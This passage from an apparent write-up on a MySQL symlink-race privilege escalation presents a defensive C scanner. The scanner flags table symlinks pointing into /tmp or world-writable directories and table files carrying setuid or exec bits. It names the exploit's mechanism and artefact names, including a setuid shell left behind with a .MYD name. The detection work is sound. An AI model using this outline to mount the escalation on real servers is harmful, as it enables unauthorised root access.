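The detection checks in 0x06 can be turned into a scan that does not depend on the exploit's default names. The following is an added example (mine, not from the page's author or the exploit), written to the two name-independent indicators above: table symlinks under the datadir that point into /tmp, /dev/shm or any world-writable directory, and table files carrying setuid or exec bits. The sample datadir it scans is constructed in a temp directory at run time; the pocdb database, the user.MYD table and the symlink target /tmp/mysql_privesc_exploit/exploit_table.MYD are taken from the page, the rest is assumed.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

struct findings { int symlinks_out; int exec_or_suid; };

/* A table symlink into /tmp, /dev/shm or a world-writable directory means the
 * table was created with DATA DIRECTORY pointing at a directory the attacker
 * controls: the exploit's precondition, whatever it named the files. */
static int target_is_suspicious(const char *target)
{
    if (!strncmp(target, "/tmp/", 5) || !strncmp(target, "/dev/shm/", 9))
        return 1;
    char parent[PATH_MAX];
    snprintf(parent, sizeof parent, "%s", target);
    char *slash = strrchr(parent, '/');
    if (!slash || slash == parent) return 0;
    *slash = '\0';
    struct stat st;
    return stat(parent, &st) == 0 && S_ISDIR(st.st_mode) && (st.st_mode & S_IWOTH);
}

/* Walk datadir/db/table (three levels is enough) and count symlinks with
 * suspicious targets and regular files with SUID or exec bits, which no
 * .MYD/.MYI/.frm/.ibd should ever carry. */
void scan_dir(const char *dir, int depth, struct findings *f)
{
    DIR *d = opendir(dir);
    if (!d) return;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        char path[PATH_MAX];
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        struct stat st;
        if (lstat(path, &st) != 0) continue;
        if (S_ISLNK(st.st_mode)) {
            char target[PATH_MAX];
            ssize_t n = readlink(path, target, sizeof target - 1);
            if (n < 0) continue;
            target[n] = '\0';
            if (target_is_suspicious(target)) {
                f->symlinks_out++;
                printf("[!] table symlink %s -> %s\n", path, target);
            }
        } else if (S_ISREG(st.st_mode)) {
            if (st.st_mode & (S_ISUID | S_IXUSR | S_IXGRP | S_IXOTH)) {
                f->exec_or_suid++;
                printf("[!] executable/setuid table file %s (mode %04o)\n", path, st.st_mode & 07777);
            }
        } else if (S_ISDIR(st.st_mode) && depth < 3) {
            scan_dir(path, depth + 1, f);
        }
    }
    closedir(d);
}

/* Constructed sample datadir: one clean table file, one table symlink into /tmp
 * (dangling, as it would be after the attacker cleans /tmp), and one table file
 * left setuid+exec by a won race. Expected result: 1 symlink, 1 setuid file. */
struct findings demo_scan(void)
{
    struct findings f = {0, 0};
    char root[] = "/tmp/scan_demo_XXXXXX";
    if (!mkdtemp(root)) return f;
    char db[PATH_MAX], clean[PATH_MAX], link[PATH_MAX], suid[PATH_MAX];
    snprintf(db, sizeof db, "%s/pocdb", root);
    snprintf(clean, sizeof clean, "%s/user.MYD", db);
    snprintf(link, sizeof link, "%s/exploit_table.MYD", db);
    snprintf(suid, sizeof suid, "%s/mysql_suid_shell.MYD", db);
    mkdir(db, 0700);
    close(open(clean, O_CREAT | O_WRONLY, 0600)); chmod(clean, 0660);
    close(open(suid, O_CREAT | O_WRONLY, 0600));  chmod(suid, 04777);
    symlink("/tmp/mysql_privesc_exploit/exploit_table.MYD", link);
    scan_dir(root, 0, &f);
    unlink(clean); unlink(suid); unlink(link); rmdir(db); rmdir(root);
    return f;
}

int main(int argc, char **argv)
{
    struct findings f = {0, 0};
    if (argc > 1) scan_dir(argv[1], 0, &f);      /* e.g. ./scan /var/lib/mysql, run as root */
    else f = demo_scan();
    printf("suspicious symlinks: %d, executable/setuid table files: %d\n", f.symlinks_out, f.exec_or_suid);
    return 0;
}
```

Legitimate DATA DIRECTORY use also produces symlinks under the datadir, which is why the scan judges the target's directory rather than the mere presence of a link; a table placed on a dedicated, root-owned volume is not flagged. Run it as root against the real datadir, and pair it with SHOW VARIABLES LIKE 'have_symlink' and a host-wide search for setuid files owned by mysql, since the shell the exploit leaves behind is a setuid file with a .MYD name.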